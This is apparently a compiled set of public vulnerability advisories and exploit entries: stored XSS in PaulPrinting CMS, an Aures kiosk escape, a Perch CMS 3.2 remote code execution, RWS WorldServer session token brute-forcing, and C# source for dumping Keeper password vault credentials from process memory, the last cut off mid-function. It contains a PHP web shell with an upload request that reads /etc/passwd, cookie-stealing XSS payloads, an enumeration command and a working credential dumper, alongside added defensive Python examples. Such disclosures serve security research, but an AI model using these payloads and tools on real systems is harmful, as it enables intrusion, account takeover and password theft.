Exploit Title: PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2285


Release Date:
=============
2023-07-19


Vulnerability Laboratory ID (VL-ID):
====================================
2285


Common Vulnerability Scoring System:
====================================
5.8


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
PaulPrinting is designed to be feature rich, easy to use and search engine friendly, with a modern design and a visually appealing interface.

(Copy of the Homepage: https://codecanyon.net/user/codepaul)


Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered multiple persistent cross site scripting vulnerabilities in the PaulPrinting (v2018) CMS web application.


Affected Product(s):
====================
CodePaul
Product: PaulPrinting (2018) - CMS (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2022-08-25: Researcher Notification & Coordination (Security Researcher)
2022-08-26: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-19: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted Authentication (User Privileges)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
Multiple persistent input validation vulnerabilities have been discovered in the official PaulPrinting (v2018) CMS web application.
The vulnerabilities allow remote attackers to inject their own malicious script code with a persistent attack vector and thereby
compromise browser-to-web-application requests from the application side.

The first vulnerability is located in the register module. Remote attackers are able to register a user account whose profile fields
contain malicious script code. After registration, the injected script executes whenever the account owner reviews the settings page
or an administrator reviews the user in the backend listing.

The second vulnerability is located in the delivery module. Remote attackers with a low privileged user account are able to inject
malicious script code into the delivery contact details. The code then executes on each interaction with the address in the frontend
and on each review of the address by an administrator in the backend listing.

Successful exploitation results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources
and persistent manipulation of the affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] /printing/register
[+] /account/delivery

Vulnerable Input(s):
[+] First name
[+] Last name
[+] Address
[+] City
[+] State

Vulnerable Parameter(s):
[+] firstname
[+] lastname
[+] address
[+] city
[+] state

Affected Module(s):
[+] Frontend Settings (./printing/account/setting)
[+] Frontend Delivery Address (./printing/account/delivery)
[+] Backend User Preview Listing
[+] Backend Delivery Address Contact Review


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by remote attackers with a low privileged user account and low user interaction.
For a security demonstration or to reproduce the vulnerability, follow the information and steps below.


Manual steps to reproduce the vulnerability ...
1. Open your browser and start an HTTP session tamper
2. Register in the application (on the login page, click register)
3. Inject your test payload into the marked vulnerable input fields
4. Save the entry by submitting the form via POST
5. Log in to the account and preview the settings
Note: Administrators in the backend render the same incorrectly validated context, which executes on preview of the user
6. The script code executes on preview of the profile settings
7. Successful reproduction of the first vulnerability!
8. Follow up by opening the delivery address module
9. Add a contact and put your test payload into the same marked vulnerable input fields
Note: The script code executes on each review of the address in the backend or in the user frontend
10. Successful reproduction of the second vulnerability!


Exploitation: Payload
"<iframe src=evil.source onload(alert(document.cookie)>
"<iframe src=evil.source onload(alert(document.domain)>


--- PoC Session Logs (POST) ---
https://paulprinting.localhost:8000/printing/account/setting
Host: paulprinting.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 357
Origin: https://paulprinting.localhost:8000
Connection: keep-alive
Referer: https://paulprinting.localhost:8000/printing/account/setting
Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd;
POST:
title=Mr.&firstname=a"<iframe src=evil.source onload(alert(document.cookie)>>
&lastname=b"<iframe src=evil.source onload(alert(document.cookie)>>
&address=c"<iframe src=evil.source onload(alert(document.cookie)>>
&city=d"<iframe src=evil.source onload(alert(document.cookie)>>
&state=e"<iframe src=evil.source onload(alert(document.cookie)>>
&zipcode=2342&country=BS&phone=23523515235235&save=Save
-
POST: HTTP/3.0 302 Found
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.1.33
location: https://paulprinting.localhost:8000/printing/account/setting?save=1
-
https://paulprinting.localhost:8000/printing/account/setting?save=1
Host: paulprinting.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://paulprinting.localhost:8000/printing/account/setting
Connection: keep-alive
Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd;
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.1.33


Vulnerable Source: Your Account - Settings
<div class="form-group row">
<label class="col-sm-4 col-form-label">First name</label>
<div class="col-sm-8">
<input type="text" name="firsttname" class="form-control" value="a"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>
<label class="col-sm-4 col-form-label">Last name</label>
<div class="col-sm-8">
<input type="text" name="lastname" class="form-control" value="b"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>
<div class="form-group row">
<label class="col-sm-4 col-form-label">Address</label>
<div class="col-sm-8">
<input type="text" name="address" class="form-control" value="c"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>
<div class="form-group row">
<label class="col-sm-4 col-form-label">City</label>
<div class="col-sm-8">
<input type="text" name="city" class="form-control" value="d"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>
<div class="form-group row">
<label class="col-sm-4 col-form-label">State</label>
<div class="col-sm-8">
<input type="text" name="state" class="form-control" value="e"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>


Vulnerable Source: Delivery Contact (Address)
<table class="table">
<thead>
<tr>
<th>Contact</th>
<th>Address</th>
<th>City</th>
<th>State</th>
<th>Country</th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td>a"<iframe src=evil.source onload(alert(document.cookie)></td>
<td>b"<iframe src=evil.source onload(alert(document.cookie)></td>
<td>c"<iframe src=evil.source onload(alert(document.cookie)></td>
<td>d"<iframe src=evil.source onload(alert(document.cookie)></td>
<td></td>
<td class="text-right">
<a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10">Edit</a>|
<a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10&delete=1" onclick="return confirm('Delete')">Delete</a>
</td></tr></tbody>
</table>
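The two rendering contexts from the captured source above, as an added Python example (this is not PaulPrinting's template code): the attribute value and the table cell written raw, next to the same strings passed through context-appropriate HTML encoding, plus a server-side allowlist for the name fields as defence in depth. The breakout string is the advisory's payload as published; note that it is written with `onload(` rather than `onload=`, so what the captured HTML shows is an injected iframe tag rather than a working handler, and what the check below counts is whether the stored value can start a tag at all. The function names and the name pattern are assumptions for illustration.

```python
import html
import re

# Breakout string reproduced from the advisory's PoC (kept as published).
PAYLOAD = 'a"<iframe src=evil.source onload(alert(document.cookie)>'

# Assumed counterpart of the affected settings template: the stored value is
# written straight into the value="" attribute.
def render_input_vulnerable(name: str, value: str) -> str:
    return f'<input type="text" name="{name}" class="form-control" value="{value}">'

# Attribute context: encode &, <, >, " and ' so the stored value can neither
# close the attribute nor open a new tag.
def render_input_fixed(name: str, value: str) -> str:
    return (f'<input type="text" name="{html.escape(name, quote=True)}" '
            f'class="form-control" value="{html.escape(value, quote=True)}">')

# Assumed counterpart of the delivery-address table: the value lands in a <td>.
def render_cell_vulnerable(value: str) -> str:
    return f"<td>{value}</td>"

# Element-content context: encoding <, > and & is what matters here.
def render_cell_fixed(value: str) -> str:
    return f"<td>{html.escape(value)}</td>"

# Defence in depth for the profile fields (assumed policy): letters in any
# script, digits, space, dot, apostrophe and hyphen; first character a letter.
NAME_RE = re.compile(r"^[^\W\d_][\w .'\-]{0,63}$")

def valid_name(value: str) -> bool:
    return NAME_RE.fullmatch(value) is not None

# Counts tag openers in a fragment: the vulnerable renderers yield one more
# opener than the markup they were asked to produce.
TAG_OPEN_RE = re.compile(r"<[A-Za-z]")

def count_tags(fragment: str) -> int:
    return len(TAG_OPEN_RE.findall(fragment))

if __name__ == "__main__":
    for label, fn in (("vulnerable", render_input_vulnerable), ("fixed", render_input_fixed)):
        out = fn("firstname", PAYLOAD)
        print(f"{label}: {count_tags(out)} tag(s) -> {out}")
```

Encoding on output is the fix; the allowlist only narrows what the register and delivery forms accept in the first place and does not replace it, since the same stored value is rendered in both the frontend and the backend listing.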


Security Risk:
==============
The security risk of the cross site scripting web vulnerabilities with persistent attack vector is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
            
Exploit Title: Aures Booking & POS Terminal - Local Privilege Escalation


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2323


Release Date:
=============
2023-07-17


Vulnerability Laboratory ID (VL-ID):
====================================
2323


Common Vulnerability Scoring System:
====================================
7.2


Vulnerability Class:
====================
Privilege Escalation


Current Estimated Price:
========================
3.000€ - 4.000€


Product & Service Introduction:
===============================
KOMET is an interactive, multifunctional kiosk and specially designed for the fast food industry. Available as a wall-mounted or
freestanding model, its design is especially adapted to foodservice such as take-aways or fast food in system catering. The kiosk
features a 27 YUNO touch system in portrait mode, an ODP 444 thermal receipt printer, a payment terminal and a 2D barcode scanner.
With a click, the customer selects, books, orders, purchases and pays directly at the kiosk. The system offers the possibility to
manage customer cards and promotions. Queue management can also be optimized.

(Copy of the Homepage: https://aures.com/de/komet/)


Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered a local kiosk privilege escalation vulnerability in the operating system of
the Aures Komet Booking & POS Terminal (Windows 10 IoT Enterprise) used by the German company immergrün franchise GmbH.


Affected Product(s):
====================
Aures Technologies GmbH
Product: Aures Komet Booking & POS Terminal - (KIOSK) (Windows 10 IoT Enterprise)


Vulnerability Disclosure Timeline:
==================================
2023-05-09: Researcher Notification & Coordination (Security Researcher)
2023-07-17: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Local


Severity Level:
===============
High


Authentication Type:
====================
Open Authentication (Anonymous Privileges)


User Interaction:
=================
No User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
A kiosk mode escalation vulnerability has been discovered in the operating system of the Aures Komet Booking & POS Terminal
(Windows 10 IoT Enterprise) used by the German company immergrün franchise GmbH. The security vulnerability allows local attackers
to bypass the kiosk mode and compromise the local file system and applications.

It is possible for local attackers to escape the kiosk mode of the Aures Komet Booking & POS Terminal. Local attackers are able to use
the touch functionality of the terminal to escalate to higher privileges. The security vulnerability is located in the context menu
function of the extended menu that appears on touch interaction. Attackers with restricted, low privileged local access to the booking
service front display are able to execute files, download content without restriction, or exfiltrate information from the local file
system of the compromised Windows based operating system.

No keyboard or cable connection is required to manipulate the service booking and payment terminal. The vulnerability requires no
user interaction to be exploited and can only be triggered with physical access to the device.

Vulnerable Operating System(s):
[+] Windows 10 (IoT Enterprise)

Affected Component(s):
[+] Context Menu

Affected Function(s):
[+] Web Search
[+] Share (Teilen)


Proof of Concept (PoC):
=======================
The local vulnerability can be exploited by local attackers with physical device access and without user interaction.
For a security demonstration or to reproduce the vulnerability, follow the information and steps below.


PoC: Sheet
Touch Display => Select Food Item => Highlight Text
=> Open Context Menu => Extend Context Menu => Web-Search
=> Browser => Local File System => Compromised!


Manual steps to reproduce the vulnerability ...
01. First touch the monitor display to wake it from standby
02. Select a food item from the immergrün menu (we recommend the Caesar wraps)
03. Push the information button of the selected food item
04. Tap twice to mark the selected food item text
05. Press a third time, holding down on the touch display, after the text has been marked
06. The operating system's context menu for highlighted text now appears
07. The context menu shows three dots that extend the visible function menu
08. Select the web-search or share function for the highlighted content in the context menu
09. The browser of the operating system opens on the main front screen
10.1 From here you are able to download and execute executables using the browser without any blacklisting (Unrestricted Web Access - Download of Files)
10.2 Attackers can open websites on the front display to manipulate the visible content (Scam & Spam - Web Messages & Web Context)
10.3 Attackers are able to manipulate the web content displayed from immergrün via the browser debugger (Phishing - Form & Banking Information)
10.4 Attackers are able to access the local file system and compromise it by reconfiguration with a privileged user account (Local File-System - Privilege Escalation)
10.5 Attackers are able to infect the local operating system with ransomware or other malicious programs and scripts (Malware - Ransomware, Keylogger, Banking Trojan & Co.)
10.6 Attackers are able to exfiltrate data from the local computer system using the web connection and available protocols
10.7 Attackers are able to perform man-in-the-middle attacks from the local computer system
11.0 Successful reproduction of the security vulnerability!


Reference(s): Pictures
- 1.png (Terminal A)
- 2.png (Terminal B)
- 3.png (Escape)
- 4.png (Awareness)


Solution - Fix & Patch:
=======================
The security vulnerability can be patched by the following steps:
1. Disable the extended (three dots) context menu
2. Disable the context menu
3. Disable web-search
4. Disable text selection in inputs and texts
5. Disallow opening websites that are not whitelisted
6. Disable file downloads
7. Restrict access to the web browser
8. Disallow the file browser
9. Disable the browser debug mode
10. Reconfigure the local firewall to allow only the required connections
11. Change the access permissions to prevent exfiltration


Security Risk:
==============
The security risk of the vulnerability in the local booking and payment terminal system is considered high.
The issue can be easily exploited by local attackers with simple interaction via the touch display.
Once compromised, the attackers can fully manipulate the computer's operating system and misuse it
for further simple or more complex attack scenarios.


Credits & Authors:
==================
Benjamin Mejri (Kunz) - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
Lars Guenther - https://www.vulnerability-lab.com/show.php?user=L.+Guenther
            
Exploit Title: Perch v3.2 - Remote Code Execution (RCE)
Application: Perch Cms
Version: v3.2
Bugs:  RCE
Technology: PHP
Vendor URL: https://grabaperch.com/
Software Link: https://grabaperch.com/download
Date found: 21.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
Steps:
1. Log in to an account as admin
2. Go to assets (http://localhost/perch_v3.2/perch/core/apps/assets/)
3. Add an asset (http://localhost/perch_v3.2/perch/core/apps/assets/edit/)
4. Upload the poc.phar file

poc.phar file contents:
<?php $a=$_GET['code']; echo system($a);?>

5. Visit http://localhost/perch_v3.2/perch/resources/admin/poc.phar?code=cat%20/etc/passwd


poc request: 

POST /perch_v3.2/perch/core/apps/assets/edit/ HTTP/1.1
Host: localhost
Content-Length: 1071
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYGoerZn09hHSjd4Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/perch_v3.2/perch/core/apps/assets/edit/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: phpwcmsBELang=en; cmsa=1; PHPSESSID=689rdj63voor49dcfm9rdpolc9
Connection: close

------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="resourceTitle"

test
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="image"; filename="poc.phar"
Content-Type: application/octet-stream

<?php $a=$_GET['code']; echo system($a);?>

------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="image_field"

1
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="image_assetID"


------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="resourceBucket"

admin
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="tags"

test
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="btnsubmit"

Submit
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="formaction"

edit
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="token"

5494af3e8dbe5ac399ca7f12219cfe82
------WebKitFormBoundaryYGoerZn09hHSjd4Z--
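The server-side check that would have rejected the upload above, written in Python as an added example (Perch is PHP; this is not Perch's code and not the author's). Both the file name and the content are checked: every extension segment is compared against names that common Apache/PHP handler configurations pass to the interpreter (Debian's default php module configuration matches `.ph(ar|p|tml)`, which is why an uploaded `.phar` executes at all), the last extension must be on an image allowlist, and the content's magic bytes must match the declared type. The function names, the `PHP_EXECUTABLE` set and the sample bytes are assumptions for illustration.

```python
import re
from pathlib import PurePosixPath
from typing import Optional, Tuple

# Extensions that common Apache/PHP setups hand to the PHP interpreter. A
# deny-list is only a backstop; the allowlist below is the real gate.
PHP_EXECUTABLE = {"php", "phar", "phtml", "php3", "php4", "php5", "php7",
                  "php8", "phps", "pht", "phpt", "inc"}

# What an asset/image upload endpoint should accept at all.
IMAGE_ALLOWLIST = {"png", "jpg", "gif", "webp"}

# (magic bytes, normalised type); RIFF needs the WEBP tag at offset 8.
MAGIC = [
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpg"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"RIFF", "webp"),
]

SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

def sniff(content: bytes) -> Optional[str]:
    """Image type according to the leading bytes, or None."""
    for magic, kind in MAGIC:
        if content.startswith(magic):
            if kind == "webp" and content[8:12] != b"WEBP":
                continue
            return kind
    return None

def check_upload(filename: str, content: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason); rejects on the first failed check."""
    # Drop any client-supplied directory part (either slash style).
    name = PurePosixPath(filename.replace("\\", "/")).name
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        return False, "no extension"
    stem, exts = parts[0], parts[1:]
    # Every segment is checked, so shell.php.png fails like poc.phar does.
    if any(e in PHP_EXECUTABLE for e in exts):
        return False, "server-executable extension in " + name
    declared = "jpg" if exts[-1] == "jpeg" else exts[-1]
    if declared not in IMAGE_ALLOWLIST:
        return False, "extension not allowed: " + exts[-1]
    if not SAFE_STEM.match(stem):
        return False, "unsafe base name"
    # Catches PHP and XML prologs hidden behind an innocent extension.
    if content.lstrip().startswith(b"<?"):
        return False, "content starts with a PHP/XML open tag"
    if sniff(content) != declared:
        return False, "content does not match declared image type"
    return True, "ok"

if __name__ == "__main__":
    webshell = b"<?php $a=$_GET['code']; echo system($a);?>"
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8
    for fname, data in (("poc.phar", webshell), ("shell.php.png", png), ("logo.png", png)):
        print(fname, "->", check_upload(fname, data))
```

Independently of the filename check, storing uploads outside the document root, or disabling script execution for the resources directory (for mod_php, `php_admin_flag engine off` in that directory block), closes this class regardless of which extensions the handler configuration happens to match.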
            
Exploit Title: RWS WorldServer 11.7.3 - Session Token Enumeration
Session tokens in RWS WorldServer have a low entropy and can be
enumerated, leading to unauthorised access to user sessions.


Details
=======

Product: WorldServer
Affected Versions: 11.7.3 and earlier versions
Fixed Version: 11.8.0
Vulnerability Type: Session Token Enumeration
Security Risk: high
Vendor URL: https://www.rws.com/localization/products/additional-solutions/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-001
Advisory Status: published
CVE: CVE-2023-38357
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38357


Introduction
============

"WorldServer offers a flexible, enterprise-class translation management
system that automates translation tasks and greatly reduces the cost of
supporting large volumes of local language content."

(from the vendor's homepage)


More Details
============

WorldServer associates user sessions with numerical tokens, which are always
positive values below 2^31. The SOAP action "loginWithToken" allows a high
number of parallel attempts to check whether a token is valid. During
analysis, many assigned tokens were found to be in the 7-digit range of
values. An attacker is therefore able to enumerate valid session tokens, and
with them user accounts, in only a few hours.


Proof of Concept
================

An example "loginWithToken" request is shown below:

-----------------------------------------------------------------------
POST /ws/services/WSContext HTTP/1.1
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 501
Host: www.example.com
Connection: close
User-Agent: agent

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" 
xmlns:soapenv="http://schemas.xmlsoap.org">
     <soapenv:Header/>
     <soapenv:Body>
        <com:loginWithToken soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
           <token xsi:type="xsd:string">FUZZ</token>
        </com:loginWithToken>
     </soapenv:Body>
</soapenv:Envelope>
-----------------------------------------------------------------------

It can be saved as file "login-soap.req" and be used as a request
template for the command-line HTTP enumerator monsoon [1] to achieve
many parallel requests:

-----------------------------------------------------------------------
$ monsoon fuzz --threads 100 \
--template-file login-soap.req \
--range 1-2147483647 \
--hide-pattern "InvalidSessionException" \
'https://www.example.com'

Target URL: https://www.example.com/

   status   header     body   value    extract

      500      191      560   5829099
      500      191      556   6229259
      200      191     3702   7545136
      500      191      556   9054984
[...]
processed 12000000 HTTP requests in 2h38m38s
4 of 12000000 requests shown, 1225 req/s
-----------------------------------------------------------------------

The --range parameter reflects the possible value range of 2^31; for each
value an HTTP request is sent to the WorldServer SOAP API, with the FUZZ
marker in the request template replaced by the respective value. Responses
containing "InvalidSessionException" are hidden, as these tokens do not
belong to a valid session. A response with status code 200 indicates that an
administrative session token was found; for an unprivileged user session,
status code 500 is returned.
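The enumeration described above, as an added example that is neither the advisory's nor monsoon's code, and not vendor code: a constructed stand-in for the loginWithToken endpoint that answers the way the advisory describes, a threaded enumerator applying the same hide-pattern logic, and the arithmetic behind "a few hours". The SOAP body, the endpoint class, the fault texts (modelled only on the InvalidSessionException string the advisory quotes) and the function names are assumptions for illustration.

```python
import re
from concurrent.futures import ThreadPoolExecutor

TOKEN_MAX = 2**31 - 1          # tokens are positive values below 2^31

def hours_to_sweep(range_size: int, req_per_s: float) -> float:
    """Wall-clock hours to try every value of a range at a given request rate."""
    return range_size / req_per_s / 3600.0

# Minimal request body; the advisory's template carries more namespaces.
SOAP_TEMPLATE = (
    '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
    "<soapenv:Body><loginWithToken><token>{token}</token></loginWithToken></soapenv:Body>"
    "</soapenv:Envelope>"
)

def build_request(token: int) -> str:
    return SOAP_TEMPLATE.format(token=token)

TOKEN_RE = re.compile(r"<token>(\d+)</token>")

class FakeWorldServer:
    """Constructed stand-in: token -> role ("admin" | "user"). Unknown tokens
    fault with InvalidSessionException (500), unprivileged sessions fault
    without it (500), administrative sessions answer 200."""
    def __init__(self, sessions):
        self.sessions = dict(sessions)

    def handle(self, soap_body: str):
        match = TOKEN_RE.search(soap_body)
        if not match:
            return 400, "<faultstring>missing token</faultstring>"
        role = self.sessions.get(int(match.group(1)))
        if role is None:
            return 500, "<faultstring>InvalidSessionException</faultstring>"
        if role == "admin":
            return 200, "<loginWithTokenResponse>session established</loginWithTokenResponse>"
        return 500, "<faultstring>session not privileged for this operation</faultstring>"

def enumerate_tokens(server, start: int, stop: int, threads: int = 100,
                     hide_pattern: str = "InvalidSessionException") -> dict:
    """Try every token in [start, stop) with `threads` parallel workers and
    keep the responses that do not match hide_pattern (monsoon's
    --hide-pattern). Returns token -> HTTP status for the survivors."""
    hide = re.compile(hide_pattern)

    def probe(token):
        status, body = server.handle(build_request(token))
        return token, status, body

    hits = {}
    with ThreadPoolExecutor(max_workers=threads) as pool:
        for token, status, body in pool.map(probe, range(start, stop)):
            if not hide.search(body):
                hits[token] = status
    return hits

if __name__ == "__main__":
    print(f"full 2^31 range at 1225 req/s: {hours_to_sweep(TOKEN_MAX, 1225):.0f} h")
    print(f"7-digit range at 1225 req/s:   {hours_to_sweep(9_000_000, 1225):.1f} h")
    demo = FakeWorldServer({7545136: "admin", 7545000: "user"})
    print(enumerate_tokens(demo, 7_544_500, 7_545_500))   # {7545000: 500, 7545136: 200}
```

At the 1225 req/s the advisory log shows, the full 2^31 space takes roughly 487 hours, while the 7-digit band the tokens were observed in (9 million values) takes about two hours, which is why the rate limit in the Workaround section matters even before the upgrade: the attack cost scales linearly with the request rate the endpoint tolerates.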


Workaround
==========

Lower the rate at which requests can be issued, for example with a
frontend proxy.


Fix
===

According to the vendor, upgrading to version 11.8.0 or later resolves the
vulnerability.


Security Risk
=============

Attackers can efficiently enumerate session tokens. In a penetration
test, it was possible to get access to multiple user accounts, including
administrative accounts using this method in under three hours.
Additionally, by using such an administrative account it seems likely to
be possible to execute arbitrary code on the underlying server by
customising the REST API [2]. Thus, the vulnerability poses a high risk.


Timeline
========

2023-03-27 Vulnerability identified
2023-03-30 Customer approved disclosure to vendor
2023-04-03 Requested security contact from vendor
2023-04-06 Vendor responded with security contact
2023-04-14 Advisory sent to vendor
2023-04-18 Vendor confirms vulnerability and states that it was already
known and fixed in version 11.8.0.
2023-07-03 Customer confirms update to fixed version
2023-07-05 CVE ID requested
2023-07-15 CVE ID assigned
2023-07-19 Advisory released

References
==========

[1] https://github.com/RedTeamPentesting/monsoon
[2] https://docs.rws.com/860026/585715/worldserver-11-7-developer-documentation/customizing-the-rest-api


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


            
# Exploit Title: Keeper Security desktop 16.10.2 & Browser Extension 16.5.4 - Password Dumping
# Google Dork: NA
# Date: 22-07-2023
# Exploit Author: H4rk3nz0
# Vendor Homepage: https://www.keepersecurity.com/en_GB/
# Software Link: https://www.keepersecurity.com/en_GB/get-keeper.html
# Version: Desktop App version 16.10.2 & Browser Extension version 16.5.4
# Tested on: Windows
# CVE : CVE-2023-36266

using System;
using System.Management;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Text.RegularExpressions;
using System.Collections.Generic;

// The Keeper Security password vault desktop application and browser extension store credentials in plain text in memory.
// This can persist after logout if the user has not explicitly enabled the option to 'clear process memory'.
// As a result, one can extract credentials and the master password from a victim after achieving low privileged access.
// This does NOT target or extract credentials from the affected browser extension (yet), only the Windows desktop app.
// Github: https://github.com/H4rk3nz0/Peeper

static class Program
{
    // To make sure we are targeting the right child process - check the command line
    public static string GetCommandLine(this Process process)
    {
        if (process is null || process.Id < 1)
        {
            return "";
        }
        string query = $@"SELECT CommandLine FROM Win32_Process WHERE ProcessId = {process.Id}";
        using (var searcher = new ManagementObjectSearcher(query))
        using (var collection = searcher.Get())
        {
            var managementObject = collection.OfType<ManagementObject>().FirstOrDefault();
            return managementObject != null ? (string)managementObject["CommandLine"] : "";
        }
    }

    //Extract plain text credential JSON strings (regex inelegant but fast)
    public static void extract_credentials(string text)
    {
        int index = text.IndexOf("{\"title\":\"");
        int eindex = text.IndexOf("}");
        while (index >= 0)
        {
            try
            {
                int endIndex = Math.Min(index + eindex, text.Length);
                Regex reg = new Regex("(\\{\\\"title\\\"[ -~]+\\}(?=\\s))");
                string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();

                int match_cut = match.IndexOf("}  ");
                if (match_cut != -1 )
                {
                    match = match.Substring(0, match_cut + "}  ".Length).TrimEnd();
                    if (!stringsList.Contains(match) && match.Length > 20)
                    {
                        Console.WriteLine("->Credential Record Found : " + match.Substring(0, match_cut + "}  ".Length) + "\n");
                        stringsList.Add(match);
                    }

                } else if (!stringsList.Contains(match.TrimEnd()) && match.Length > 20)
                {
                    Console.WriteLine("->Credential Record Found : " + match + "\n");
                    stringsList.Add(match.TrimEnd());
                }
                index = text.IndexOf("{\"title\":\"", index + 1);
                eindex = text.IndexOf("}", eindex + 1);
            }
            catch
            {
                return;
            }

        }
    }

    // extract account/email containing JSON string
    public static void extract_account(string text)
    {
        int index = text.IndexOf("{\"expiry\"");
        int eindex = text.IndexOf("}");
        while (index >= 0)
        {
            try
            {
                int endIndex = Math.Min(index + eindex, text.Length);
                Regex reg = new Regex("(\\{\\\"expiry\\\"[ -~]+@[ -~]+(?=\\}).)");
                string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
                if ((match.Length > 2))
                {
                    Console.WriteLine("->Account Record Found : " + match + "\n");
                    return;
                }
                index = text.IndexOf("{\"expiry\"", index + 1);
                eindex = text.IndexOf("}", eindex + 1);
            }
            catch
            {
                return;
            }
        }

    }

    // Master password not available with SSO based logins but worth looking for.
    // Disregard other data key entries that seem to match: _not_master_key_example
    public static void extract_master(string text)
    {
        int index = text.IndexOf("data_key");
        int eindex = index + 64;
        while (index >= 0)
        {
            try
            {
                int endIndex = Math.Min(index + eindex, text.Length);
                Regex reg = new Regex("(data_key[ -~]+)");
                var match_one = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
                Regex clean = new Regex("(_[a-zA-Z]{1,14}_[a-zA-Z]{1,10})");
                if (match_one.Replace("data_key", "").Length > 5)
                {
                    if (!clean.IsMatch(match_one.Replace("data_key", "")))
                    {
                        Console.WriteLine("->Master Password : " + match_one.Replace("data_key", "") + "\n");
                    }

                }
                index = text.IndexOf("data_key", index + 1);
                eindex = index + 64;
            }
            catch
            {
                return;
            }

        }
    }

    // Store extracted strings and compare against them to avoid duplicate output
    public static List<string> stringsList = new List<string>();

    // Main function, iterates over private committed memory pages, reads memory and performs regex against the pages UTF-8
    // Performs OpenProcess to get handle with necessary query permissions
    static void Main(string[] args)
    {
        foreach (var process in Process.GetProcessesByName("keeperpasswordmanager"))
